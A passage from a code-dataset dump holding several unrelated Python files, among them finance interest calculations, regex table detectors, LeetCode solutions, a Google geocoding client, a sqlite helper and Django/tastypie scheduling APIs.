r'\\d{3,4}.{1,3}to'\n\n if (re.match(test_string_year, value) or re.match(test_string_month, value) or\n re.match(test_string_period, value) or re.match(test_string_to, value)):\n\n match_beginning_year = []\n match_beginning_month = []\n match_beginning_period = []\n match_beginning_to = []\n\n for match in finditer(print_test_account, value):\n # print(match.span(), match.group())\n match_beginning = match.span()[0]\n match_end = match.span()[-1]\n\n for match in finditer(print_test_year, value):\n # print(match.span(), match.group())\n match_beginning_year.append(match.span()[0])\n\n for match in finditer(print_test_month, value):\n match_beginning_month.append(match.span()[0])\n\n for match in finditer(print_test_period, value):\n match_beginning_period.append(match.span()[0])\n\n for match in finditer(print_test_to, value):\n match_beginning_to.append(match.span()[0])\n\n sub_match_list = match_beginning_year + match_beginning_month + match_beginning_period + match_beginning_to\n distance_list = [True for match in sub_match_list if abs(match_end - match) < 45]\n if any(distance_list):\n value_out = 1\n\n else:\n value_out = 0\n\n return value_out\n\ndef trailing_number_content(row):\n \"\"\"Search current or next zone string for high-density of numbers (indicating table).\"\"\"\n\n value_out = 0\n current_zone = str(row['text'])\n zone_next = str(row['zone_next'])\n\n def digit_ratio(test_string):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n digit_count = 0\n for char in test_string.replace(' ', ''):\n if char.isdigit():\n digit_count += 1\n\n digit_ratio = digit_count / len(test_string.replace(' ', ''))\n return 
digit_ratio\n\n def count_dollars(test_string):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n dollar_count = 0\n for char in test_string.replace(' ', ''):\n if char == '$' or char == '£':\n dollar_count += 1\n\n return dollar_count\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].*'\n print_test = r'[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}'\n\n if re.match(test_string, current_zone):\n for match in finditer(print_test, current_zone):\n # print(match.span(), match.group())\n # print(row.name)\n match_beginning = match.span()[0]\n len_to_end = len(current_zone) - match_beginning\n if len_to_end < 350:\n overflow = 350 - len_to_end\n test_string = current_zone[match_beginning:] + zone_next[:overflow]\n else:\n test_string = current_zone[match_beginning:match_beginning + 350]\n\n test_string_digit_ratio = digit_ratio(test_string)\n test_string_dollar_count = count_dollars(test_string)\n\n if test_string_digit_ratio > .15 and test_string_dollar_count > 3:\n value_out = 1\n\n return value_out\n\ndef test_trailing_colon(value):\n \"\"\"ID trailing colons and semi-colons\"\"\"\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}\\s*[\\;\\:].*'\n if re.match(test_string, str(value)):\n value_out = 1\n else:\n value_out = 0\n\n return value_out\n","sub_path":"zone_content_tools/zone_content_id/codebase/IncomeAccountOps.py","file_name":"IncomeAccountOps.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288888686","text":"#!/usr/bin/env python3\n'''\nSee docstring for class AmountIncreaseTrail\n'''\n\n# from datetime import date\n# from datetime import timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date\nimport calendar # for calendar.monthrange(year, month)\nimport json\n# import sys\n\n\ndef treat_date(p_date):\n if p_date is None:\n return None\n if type(p_date) == date:\n return p_date\n p_date = str(p_date)\n pp = p_date.split('-')\n if len(pp) < 3:\n return None\n try:\n year = int(pp[0])\n month = int(pp[1])\n day = int(pp[2])\n return date(year, month, day)\n except ValueError:\n pass\n return None\n\nclass AmountIncreaseTrail:\n '''\n This class stores the properties (attributes) of an \"Amount Increase Trail\" piece.\n An \"Amount Increase Trail\" piece stores a step-increase \"vector\" in a finance mora\n calculation.\n\n All steps (ie, a list of AIT's) will give the full evolution of a debt.\n '''\n\n def __init__(self,\n montant_ini,\n monthrefdate,\n restart_timerange_date, # not to be confused with restart_mora_date\n end_timerange_date, # ie restart_mora_date is end_timerange_date + 1 day\n interest_rate,\n corrmonet_in_month,\n paid_amount = None,\n finevalue = None,\n monthseqnumber = 1,\n contract_id = None\n ):\n '''\n Dynamic properties, ie derived fields, depend on other (original) fields (above)\n\n uptodate\n restart_mora_date\n was_fine_applied\n daysinmonth\n increaseamount\n updatedvalue\n balance\n\n self.uptodate\n => the same as end_timerange_date\n self.restart_mora_date\n => day after end_timerange_date\n self.was_fine_applied\n => if finevalue is not None, was_fine_applied is True; False otherwise\n self.daysinmonth\n => it calendar.monthrange(end_timerange_date)[1] (ie, total days in a month) of M+1\n OBS.: end_timerange_date AND restart_timerange_date MUST ALWAYS BE IN THE SAME MONTH/YEAR\n otherwise, an exception will be raised\n self.increaseamount\n => it's the 
interest plus corr.monet. applied to debt (it does not include fine)\n self.updatedvalue\n => it's debt plus increaseamount (as above, it also does not include fine)\n self.balance\n => it's the net result of bill minus payment and possibly financial increases if payment is late\n balance is also called forwardvalue, for, when it's not zero, it becomes either\n previousdebts or cred_amount in the following bill.\n '''\n self.montant_ini = montant_ini\n monthrefdate = treat_date(monthrefdate)\n self.monthrefdate = monthrefdate # this is never changed across an Amount Increase Trail list that shows the updating of a debt_account according to late payments!\n self.monthseqnumber = monthseqnumber\n self.contract_id = contract_id\n restart_timerange_date = treat_date(restart_timerange_date)\n self.restart_timerange_date = restart_timerange_date\n end_timerange_date = treat_date(end_timerange_date)\n self.end_timerange_date = end_timerange_date\n self.interest_rate = interest_rate\n self.corrmonet_in_month = corrmonet_in_month\n self.paid_amount = paid_amount # if not None, end_timerange_date equals semantically paydate\n self.finevalue = finevalue\n\n if self.restart_timerange_date is None:\n self.restart_timerange_date = self.monthrefdate + relativedelta(months=+1)\n if self.end_timerange_date is None:\n year = self.restart_timerange_date.year\n month = self.restart_timerange_date.month\n lastdayinmonth = calendar.monthrange(year, month)[1]\n self.end_timerange_date = self.restart_timerange_date.replace(day=lastdayinmonth)\n self.check_ini_n_end_dates_n_raise_if_consistent()\n\n\n\n @property\n def daysininterest(self):\n delta = self.end_timerange_date - self.restart_timerange_date\n days_in_range = delta.days + 1\n return days_in_range\n\n @property\n def monthfraction(self):\n return self.daysininterest / self.daysinmonth\n\n @property\n def updatefactor(self):\n return (self.interest_rate + self.corrmonet_in_month) * self.monthfraction\n\n @property\n def was_fine_applied(self):\n if self.finevalue is None:\n return False\n return True\n\n @property\n def restart_mora_date(self):\n '''\n formerly this method was called day_after_end_date()\n :return:\n '''\n return self.end_timerange_date + relativedelta(days=+1)\n\n def check_ini_n_end_dates_n_raise_if_consistent(self):\n iniyear = self.restart_timerange_date.year\n inimonth = self.restart_timerange_date.month\n fimyear = self.end_timerange_date.year\n fimmonth = self.end_timerange_date.month\n if (iniyear, inimonth) != (fimyear, fimmonth):\n error_msg = '(iniyear=%d, inimonth=%d) != (fimyear=%d, fimmonth=%d)' %(iniyear, inimonth, fimyear, fimmonth)\n raise ValueError(error_msg)\n\n @property\n def daysinmonth(self):\n self.check_ini_n_end_dates_n_raise_if_consistent()\n return calendar.monthrange(self.end_timerange_date.year, self.end_timerange_date.month)[1]\n\n @property\n def increaseamount(self):\n return self.montant_ini * self.updatefactor\n\n @property\n def updatedvalue(self):\n '''\n updatedvalue does not take into consideration 'fine'\n :return:\n '''\n return self.montant_ini + self.increaseamount\n\n @property\n def balance(self):\n '''\n balance was once called forwardvalue\n :return:\n '''\n multa = 0\n paid_amount = 0\n if self.finevalue is not None:\n multa = self.finevalue\n if self.paid_amount is not None:\n paid_amount = self.paid_amount\n return self.updatedvalue + multa - paid_amount\n\n def extract_lastdayofmonth_of_enddate(self):\n year = self.end_timerange_date.year\n month = self.end_timerange_date.month\n 
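# calendar.monthrange(year, month) returns (weekday of the 1st, number of days in the month); index [1] is the day count used below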
lastdayinmonth = calendar.monthrange(year, month)[1]\n lastdayofmonthdate = self.end_timerange_date.replace(day=lastdayinmonth)\n return lastdayofmonthdate\n\n @staticmethod\n def staticmethod_to_adjusted_dict_for_jsondump(obj):\n if obj is None:\n return None\n if type(obj) != AmountIncreaseTrail:\n return None\n return obj.to_adjusted_dict_for_jsondump()\n\n\n def to_json(self):\n # return json.dump(self, default=AmountIncreaseTrail.staticmethod_to_adjusted_dict_for_jsondump)\n return json.dumps(self.to_adjusted_dict_for_jsondump())\n\n def to_adjusted_dict_for_jsondump(self):\n '''\n adjusted here means date(yyyy, mm, dd) becomes 'yyyy-mm-dd', ie, from date type to string type\n\n self.montant_ini\n self.monthrefdate\n self.monthseqnumber\n self.contract_id\n self.restart_timerange_date\n self.end_timerange_date\n self.interest_rate\n self.corrmonet_in_month\n self.paid_amount\n self.finevalue\n\n :return:\n '''\n objsdict = self.__dict__\n # treat the 3 dates (monthrefdate ^ restart_timerange_date ^ end_timerange_date)\n monthrefdate = str(self.monthrefdate)\n objsdict['monthrefdate'] = monthrefdate\n restart_timerange_date = str(self.restart_timerange_date)\n objsdict['restart_timerange_date'] = restart_timerange_date\n end_timerange_date = str(self.end_timerange_date)\n objsdict['end_timerange_date'] = end_timerange_date\n return objsdict\n\n @staticmethod\n def from_json(jsonstr):\n objsdict = json.loads(jsonstr) #, encoding='utf-8', cls=AmountIncreaseTrail)\n return AmountIncreaseTrail(**objsdict)\n\n def __str__(self):\n fieldlist = [\n 'montant_ini', 'interest_rate', 'corrmonet_in_month',\n 'monthrefdate', 'restart_timerange_date', 'end_timerange_date',\n 'daysininterest', 'daysinmonth', 'monthfraction', 'updatefactor',\n 'increaseamount', 'updatedvalue', 'paid_amount',\n 'was_fine_applied', 'finevalue', 'balance',\n ]\n datadict = {}\n for f in fieldlist:\n exec(\"datadict['%s'] = self.%s\" %(f, f))\n monthyearref = '{0}/{1}'.format(self.monthrefdate.month, self.monthrefdate.year)\n outstr = '''\n =================\n Mês ref.: {0}\n ================='''.format(monthyearref)\n outstr += '''\n -> montante base = {montant_ini:.2f}\n -> alícota juros = {interest_rate:.2f}\n -> corr.monet. no mês = {corrmonet_in_month:.4f}\n -> data-início j+cm = {restart_timerange_date}\n -> data-até j+cm = {end_timerange_date} \n -> dias contados = {daysininterest}\n -> dias no mês = {daysinmonth}\n -> fração do mês (fm) = {monthfraction:.2f}\n -> fator atu(j+cm)*fm = {updatefactor:.4f}\n -> montante*(j+cm)*fm = {increaseamount:.2f}\n -> montante atualiz. 
= {updatedvalue:.2f}'''.format(**datadict)\n if self.paid_amount is not None and self.paid_amount > 0:\n outstr += '''\n -> pagamento = -{paid_amount}\n em {end_timerange_date}'''.format(**datadict)\n if self.was_fine_applied:\n outstr += '''\n -> incidência multa = {finevalue}'''.format(**datadict)\n outstr += '''\n ----------------------------------\n Saldo a pagar = {balance:.2f}\n em {end_timerange_date}\n ----------------------------------\n '''.format(**datadict)\n return outstr\n\ndef adhoctest():\n ait = AmountIncreaseTrail(\n montant_ini = 1000,\n monthrefdate = date(2017,1,1),\n restart_timerange_date = None,\n end_timerange_date = None,\n interest_rate = 0.01,\n corrmonet_in_month = 0.004,\n paid_amount = 800,\n finevalue = 100,\n )\n print (ait)\n\n ait = AmountIncreaseTrail(\n montant_ini = 2000,\n monthrefdate = date(2017,12,1),\n restart_timerange_date = date(2018,3,15),\n end_timerange_date = None,\n interest_rate = 0.01,\n corrmonet_in_month = 0.004,\n paid_amount = None,\n finevalue = None,\n )\n print (ait)\n print (ait.to_json())\n '''\n jsonrepr = json.dumps(ait, default=AmountIncreaseTrail.staticmethod_to_adjusted_dict_for_jsondump)\n print('jsonrepr =>', jsonrepr)\n obj = AmountIncreaseTrail.from_json(jsonrepr)\n print(obj)\n '''\n\n\nif __name__ == '__main__':\n adhoctest()\n\n# TO-DO: unit testing","sub_path":"models/AmountIncreaseTrailMod.py","file_name":"AmountIncreaseTrailMod.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540496590","text":"from typing import List\n\n\nclass Solution:\n\n def maxProfit(self, prices: List[int]) -> int:\n if not prices or len(prices) < 2:\n return 0\n\n dp = [[0, 0] for _ in range(len(prices))]\n\n dp[0][0] = 0\n dp[0][1] = - prices[0]\n\n for i in range(1, len(prices)):\n dp[i][0] = max(dp[i - 1][1] + prices[i], dp[i - 1][0])\n dp[i][1] = max(dp[i - 1][1], - prices[i])\n\n return dp[-1][0]\n\n\nsolution = Solution()\n\nassert solution.maxProfit([7, 6, 4, 3, 1]) == 0\nassert solution.maxProfit([7, 1, 5, 3, 6, 4]) == 5\nassert solution.maxProfit([2, 1, 2, 1, 0, 1, 2]) == 2\nassert solution.maxProfit([1, 2]) == 1\n","sub_path":"0121_best_time_to_buy_and_sell_stock.py","file_name":"0121_best_time_to_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485169757","text":"from .. import common\nimport datetime\nfrom .. import models\nfrom .. 
import TMSYS_ConfigChangeObjectPriority\ndef set_dict_detail_update_data(args, rank_code):\n ret_dict = set_dict_detail_insert_data(args, rank_code)\n del ret_dict['rec_id']\n ret_dict['modified_on'] = datetime.datetime.now()\n ret_dict['modified_by'] = common.get_user_id()\n return ret_dict\n\ndef set_dict_detail_insert_data(args, rank_code):\n ret_dict = dict()\n change_object = []\n object = {}\n object_name = \"\"\n column_name = \"\"\n if args.has_key('change_object') and args.has_key('object_code'):\n change_object = TMSYS_ConfigChangeObjectPriority.get_list({\"data\":{\"name\":\"TMChangeObjectRank\"}})\n for x in change_object:\n if x['change_object'] == args['change_object']:\n object = x\n break\n __collection = getattr(models, object['table_name'])()\n if object['change_object'] == 1:\n column_name = \"gjw_code\"\n ret = __collection.aggregate().project(gjw_code = 1, gjw_name = 1)\n object_name = ret.match(column_name + \" in {0}\", args['object_code']).get_item()['gjw_name']\n elif object['change_object'] == 2:\n column_name = \"job_w_code\"\n ret = __collection.aggregate().project(job_w_code = 1, job_w_name = 1)\n object_name = ret.match(column_name + \" in {0}\", args['object_code']).get_item()['job_w_name']\n elif object['change_object'] == 3:\n column_name = \"job_pos_code\"\n ret = __collection.aggregate().project(job_pos_code = 1, job_pos_name = 1)\n object_name = ret.match(column_name + \" == {0}\", args['object_code']).get_item()['job_pos_name']\n elif object['change_object'] == 4:\n column_name = \"emp_type_code\"\n ret = __collection.aggregate().project(emp_type_code = 1, emp_type_name = 1)\n object_name = ret.match(column_name + \" == {0}\", args['object_code']).get_item()['emp_type_name']\n else:\n return None\n\n ret_dict.update(\n rec_id = common.generate_guid(),\n rank_code = rank_code,\n change_object = (lambda x: x['change_object'] if x.has_key('change_object') else None)(args),\n object_level = None,\n object_code = (lambda x: x['object_code'] if x.has_key('object_code') else None)(args),\n object_name = object_name,\n priority_no = object['priority_no'],\n total_from = (lambda x: x['total_from'] if x.has_key('total_from') else None)(args),\n total_to = (lambda x: x['total_to'] if x.has_key('total_to') else None)(args),\n note = (lambda x: x['note'] if x.has_key('note') else None)(args),\n created_on = datetime.datetime.now(),\n created_by = common.get_user_id(),\n modified_on = \"\",\n modified_by = \"\"\n )\n return ret_dict","sub_path":"apps/performance/api/services/TMLS_RankService.py","file_name":"TMLS_RankService.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"478808821","text":"import numpy as np\nfrom scripts.utils.model_loader import load_model\nimport json\nfrom scripts.train_simple_nn import WINDOW_SIZE\nfrom scripts.utils.encoder import encode_input_window\nfrom scripts.utils.preparation import list_to_windows, Type\n\n\n# models = {\n# Type.EUK: load_model(Type.EUK),\n# Type.GRAMP: load_model(Type.GRAMP),\n# Type.GRAMN: load_model(Type.GRAMN)\n# }\n\ndef predict_sequences_json(sequences, model):\n collection = [predict_sequence_json(x, model) for x in sequences]\n return json.dumps(collection)\n\n\ndef predict_sequence_json(sequence, model):\n signal_predict, cleavarage_predict, muture_predict, sequence_cutted = predict_sequence(sequence.seq, model)\n return sequence.prediction_to_json(signal_predict.tolist(),\n cleavarage_predict.tolist(),\n 
muture_predict.tolist(), sequence_cutted)\n\n\ndef predict_sequence(sequence_str, model):\n    prepared = prepare_seq(sequence_str, WINDOW_SIZE)\n    predicted = model.predict(prepared)\n    signal_predict = predicted[:, 0]\n    cleavarage_predict = predicted[:, 1]\n    muture_predict = predicted[:, 2]\n    return signal_predict, cleavarage_predict, muture_predict, sequence_str[0:len(signal_predict)]\n\n\ndef prepare_seq(sequence, window_size=1):\n    window_half = window_size // 2  # pad with half the window; note '>> 2 - 1' would parse as '>> (2 - 1)', a shift by one\n    prefixed = '-' * window_half + sequence[0:(70 + window_half)]\n    chunked = list_to_windows(prefixed, window_size)\n    encoded = np.array([encode_input_window(x) for x in chunked])\n    return encoded","sub_path":"scripts/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473098692","text":"f = open(\"day2input.txt\")\n\ntwosList = []\nthreesList = []\n\nfor container in f:\n    temp = list(container)\n    if '\\n' in temp:\n        temp.remove('\\n')\n\n    for char in temp:\n        if temp.count(char) == 2:\n            if temp not in twosList:\n                twosList.append(temp)\n        elif temp.count(char) == 3:\n            if temp not in threesList:\n                threesList.append(temp)\n\n\nprint(len(twosList) * len(threesList))\n","sub_path":"day2-part1.py","file_name":"day2-part1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169863995","text":"class Solution(object):\n    def isAnagram(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: bool\n        \"\"\"\n        if len(s) != len(t):\n            return False\n        counts = {}  # per-character balance: +1 for chars seen in s, -1 for chars seen in t\n        for i in range(len(s)):\n            counts[s[i]] = counts.setdefault(s[i], 0) + 1\n            counts[t[i]] = counts.setdefault(t[i], 0) - 1\n        for i in counts:\n            if counts.get(i) != 0:\n                return False\n        return True","sub_path":"242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79647177","text":"import sqlite3 as sql\n\n\nclass sqlMaster:\n    def __init__(self):\n        self.open()\n        # self.cur.execute(\"DROP TABLE urls\")\n        # self.cur.execute(\"CREATE TABLE urls(localPath TEXT, destination TEXT)\")\n        self.close()\n\n    def open(self):\n        self.con = sql.connect('urls.db')\n        self.cur = self.con.cursor()\n\n    def insert(self, localPath, destination):\n        self.open()\n        # use a parameterized query so the values are quoted safely by sqlite3\n        self.cur.execute(\"INSERT INTO urls VALUES(?, ?)\", (localPath, destination))\n        self.close()\n\n    def getAll(self):\n        self.open()\n        s = self.cur.execute(\"SELECT * FROM urls\").fetchall()\n        self.close()\n        l = list(s)\n        x = []\n        for r in l:\n            x.append(list(r))\n        return x\n\n    def getAllDict(self):\n        self.open()\n        s = self.cur.execute(\"SELECT * FROM urls\").fetchall()\n        self.close()\n        result = {}\n        for tup in s:\n            result[tup[0]] = tup[1]\n        return result\n\n    def close(self):\n        self.cur.close()\n        self.con.commit()\n        self.con.close()\n\n    def hasLocalPath(self, localPath):\n        data = self.getAll()\n        for entry in data:\n            if entry[0].encode(\"ascii\") == localPath:\n                return True\n        return False\n","sub_path":"sqlMaster.py","file_name":"sqlMaster.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268943013","text":"\"\"\"\nPurpose:\nThis class contains methods to retrieve geolocation information from the Google API.\n\nget_geo_coordinates_from_google: 
Retrieve Latitude and Longitude for a given Address/Location\nget_altitude_from_google: Retrieve Altitude Information for a given Latitude and Longitude\nget_address_altitude_from_google: Retrieve Altitude Information for a given Address/Location\n\nDevelopers:\nKevin Patel (GitHub Username: PatelKeviin)\n    get_geo_coordinates_from_google\n\nSponsor: DataDisca Pty Ltd. Australia\nhttps://github.com/DataDisca\n\"\"\"\nimport logging\nimport logging.config\nimport requests\n\n\nclass GeoCoordinatesGoogle:\n\n    # Set Log Level\n    logging.basicConfig(filename='./log/google_log.log',\n                        level=logging.INFO,\n                        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n    # Class Variables\n    connection_params: dict = {}\n\n    def __init__(self, api_key: str, output_format: str = 'json') -> None:\n        \"\"\"\n        Class Initializer\n        @param output_format: Required Output Format\n        @param api_key: Google API Key\n        \"\"\"\n        self.connection_params = {'output_format': output_format, 'api_key': api_key}\n\n    @staticmethod\n    def __get_error_msg(error_msg: str):\n        \"\"\"\n        purpose: Return an Error Object with a given Error Message\n        @param error_msg: Error Message\n        @return: Dict\n            {\n                'status': False,\n                'message': error_msg,\n                'result': None\n            }\n        \"\"\"\n        return {\n            'status': False,\n            'message': error_msg,\n            'result': None\n        }\n\n    def get_geo_coordinates_from_google(self, location_address: str) -> dict:\n        \"\"\"\n        purpose: Retrieve Latitude and Longitude for a given Address/Location\n        @param location_address: Address/Location whose Latitude and Longitude are needed\n        @return: Dict\n            status: True or False based on success,\n            message: Error message if an error occurred\n            result:\n                {\n                    'latitude': Latitude of the Address Provided\n                    'longitude': Longitude of the Address Provided\n                }\n        \"\"\"\n        base_url = 'https://maps.googleapis.com/maps/api/geocode'\n        endpoint = '{}/{}?address={}&key={}'.format(base_url,\n                                                    self.connection_params['output_format'],\n                                                    location_address,\n                                                    self.connection_params['api_key']\n                                                    )\n\n        try:\n            # make the GET request\n            results = requests.get(endpoint).json()\n\n            # check if coordinates were successfully obtained or not\n            if results['status'] == 'OK':\n                location = results['results'][0]['geometry']['location']\n\n                return {\n                    'status': True,\n                    'message': None,\n                    'result': {\n                        'longitude': location['lng'],\n                        'latitude': location['lat']\n                    }\n                }\n\n            elif results['status'] == 'ZERO_RESULTS':\n                return self.__get_error_msg('Zero Results')\n            else:\n                # surface any other Google status (e.g. OVER_QUERY_LIMIT, REQUEST_DENIED) to the caller\n                return self.__get_error_msg('Google API Status: {}'.format(results['status']))\n        except requests.exceptions.ConnectionError:  # requests raises its own ConnectionError subclass\n            return self.__get_error_msg('Connection Error')\n        except TypeError:\n            return self.__get_error_msg('Type Error')\n        except Exception as e:\n            return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n\n    def get_altitude_from_google(self, latitude: float, longitude: float):\n        \"\"\"\n        purpose: Retrieve the Altitude for a given Latitude and Longitude\n        @param latitude: Latitude of the Location where Altitude is needed\n        @param longitude: Longitude of the Location\n        @return: Dict\n            status: True or False based on success,\n            message: Error message if an error occurred\n            result:\n                {\n                    'latitude': Latitude of the given location\n                    'longitude': Longitude of the given location\n                    'altitude': Altitude of the given location\n                }\n        \"\"\"\n        base_url = 'https://maps.googleapis.com/maps/api/elevation'\n        endpoint = '{}/{}?locations={},{}&key={}'.format(base_url,\n                                                         self.connection_params['output_format'],\n                                                         latitude,\n                                                         longitude,\n                                                         self.connection_params['api_key']\n                                                         )\n\n        try:\n            # make the GET request\n            results = requests.get(endpoint).json()\n\n            # 
check if the elevation was successfully obtained or not\n            if results['status'] == 'OK':\n                altitude = results['results'][0]['elevation']\n                location = results['results'][0]['location']\n                return {\n                    'status': True,\n                    'message': None,\n                    'result': {\n                        'latitude': location['lat'],\n                        'longitude': location['lng'],\n                        'altitude': altitude\n                    }\n                }\n\n            elif results['status'] == 'ZERO_RESULTS':\n                return self.__get_error_msg('Zero Results')\n            else:\n                return self.__get_error_msg('Google API Status: {}'.format(results['status']))\n        except requests.exceptions.ConnectionError:\n            return self.__get_error_msg('Connection Error')\n        except TypeError:\n            return self.__get_error_msg('Type Error')\n        except Exception as e:\n            return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n\n    def get_address_altitude_from_google(self, location_address: str):\n        \"\"\"\n        purpose: Retrieve the Latitude, Longitude and Altitude for a given Address/Location\n        @param location_address: Address/Location whose coordinates and Altitude are needed\n        @return: Dict\n            status: True or False based on success,\n            message: Error message if an error occurred\n            result:\n                {\n                    'latitude': Latitude of the given location\n                    'longitude': Longitude of the given location\n                    'altitude': Altitude of the given location\n                }\n        \"\"\"\n        try:\n            lat_long = self.get_geo_coordinates_from_google(location_address)\n            if lat_long['status']:\n                latitude = lat_long['result']['latitude']\n                longitude = lat_long['result']['longitude']\n                resp = self.get_altitude_from_google(latitude, longitude)\n                return {\n                    'status': True,\n                    'message': None,\n                    'result': {\n                        'latitude': resp['result']['latitude'],\n                        'longitude': resp['result']['longitude'],\n                        'altitude': resp['result']['altitude']\n                    }\n                }\n            else:\n                return lat_long\n\n        except requests.exceptions.ConnectionError:\n            return self.__get_error_msg('Connection Error')\n        except TypeError:\n            return self.__get_error_msg('Type Error')\n        except Exception as e:\n            return self.__get_error_msg('Unknown Error Occurred, Error: {}'.format(e))\n","sub_path":"GeoCoordinatesGoogle.py","file_name":"GeoCoordinatesGoogle.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123979697","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\n\nimport views\n\n\nurlpatterns = patterns(\n    '',\n    url(r'^login/(?P\\d+)/$', views.LoginView.as_view(), name='login'),\n    url(r'^logout/$', 'django.contrib.auth.views.logout',\n        {'next_page': '/'}, name='logout'),\n)\n","sub_path":"dj_tools/dev/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417856308","text":"# -*- coding: utf-8 -*-\n\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom tastypie import fields\nfrom tastypie.api import Api\nfrom apiutils.resources import ExtResource, ComplexQuery, ExtBatchResource\nfrom scheduler.models import RejectionCause, Calendar, Event, Preorder\nfrom patient.utils import smartFilter\nfrom django.db.models.query_utils import Q\n\n\nclass CalendarResource(ExtResource):\n\n    class Meta:\n        queryset = Calendar.objects.all()\n        resource_name = 'calendar'\n        authorization = DjangoAuthorization()\n        filtering = {\n            'title': ALL,\n        }\n        list_allowed_methods = ['get', 'post', 'put']\n\n\nclass RejectionCauseResource(ExtResource):\n\n    class Meta:\n        queryset = RejectionCause.objects.all()\n        resource_name = 'rejection_cause'\n        authorization = DjangoAuthorization()\n        filtering = {\n            'name': ALL,\n        }\n        list_allowed_methods = ['get', 
'post', 'put']\n\n\nclass EventResource(ExtResource):\n staff = fields.ForeignKey('staff.api.PositionResource', 'staff', null=True)\n #preord = fields.ToOneField(PreorderResource, 'preord', null=True)\n\n def dehydrate(self, bundle):\n bundle.data['start'] = bundle.obj.start.strftime('%a %b %d %Y %H:%M:%S')\n bundle.data['end'] = bundle.obj.end.strftime('%a %b %d %Y %H:%M:%S ')\n #bundle.data['preord'] = bundle.obj.preord and bundle.obj.preord.id\n return bundle\n\n class Meta:\n queryset = Event.objects.all().select_related().order_by('start')\n resource_name = 'event'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'title': ALL,\n 'id': ALL,\n 'cid': ALL,\n 'start': ALL,\n 'end': ALL,\n 'timeslot': ALL,\n 'status': ALL,\n 'preord': ALL\n\n }\n limit = 1000\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass PreorderResource(ExtBatchResource):\n patient = fields.ForeignKey('patient.api.PatientResource', 'patient', null=True)\n timeslot = fields.OneToOneField(EventResource, 'timeslot', null=True)\n service = fields.ForeignKey('service.api.ExtendedServiceResource', 'service', null=True)\n promotion = fields.ForeignKey('promotion.api.PromotionResource', 'promotion', null=True)\n rejection_cause = fields.ForeignKey(RejectionCauseResource, 'rejection_cause', null=True)\n card = fields.ForeignKey('examination.api.CardResource', 'card', null=True)\n referral = fields.ForeignKey('visit.api.ReferralResource', 'referral', null=True)\n who_deleted = fields.ForeignKey('core.api.UserResource', 'who_deleted', null=True)\n\n def obj_create(self, bundle, request=None, **kwargs):\n kwargs['operator'] = request.user\n referral = request and request.active_profile.staff.referral\n if referral:\n kwargs['referral'] = referral\n result = super(PreorderResource, self).obj_create(bundle=bundle, request=request, **kwargs)\n return result\n\n def obj_update(self, bundle, request=None, **kwargs):\n if bundle.data['deleted']:\n bundle.data['who_deleted'] = request.user\n result = super(PreorderResource, self).obj_update(bundle=bundle, request=request, **kwargs)\n return result\n\n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n\n orm_filters = super(PreorderResource, self).build_filters(filters)\n\n if \"search\" in filters:\n smart_filters = smartFilter(filters['search'], 'patient')\n if len(smart_filters.keys()) == 1:\n try:\n orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n | Q(**smart_filters), **orm_filters)\n except:\n orm_filters.update(**smart_filters)\n else:\n orm_filters.update(**smart_filters)\n return orm_filters\n\n class Meta:\n queryset = Preorder.objects.filter(deleted=False)\n resource_name = 'preorder'\n authorization = DjangoAuthorization()\n always_return_data = True\n filtering = {\n 'patient': ALL_WITH_RELATIONS,\n 'timeslot': ALL,\n 'service': ALL_WITH_RELATIONS,\n 'payment_type': ALL,\n 'card': ALL_WITH_RELATIONS\n }\n list_allowed_methods = ['get', 'post', 'put']\n\n\nclass ExtPreorderResource(ExtResource):\n patient = fields.ForeignKey('patient.api.PatientResource', 'patient', null=True)\n timeslot = fields.OneToOneField(EventResource, 'timeslot', null=True)\n visit = fields.OneToOneField('visit.api.VisitResource', 'visit', null=True)\n service = fields.ForeignKey('service.api.ExtendedServiceResource', 'service', null=True)\n promotion = fields.ForeignKey('promotion.api.PromotionResource', 'promotion', null=True)\n card = fields.ForeignKey('examination.api.CardResource', 'card', null=True)\n 
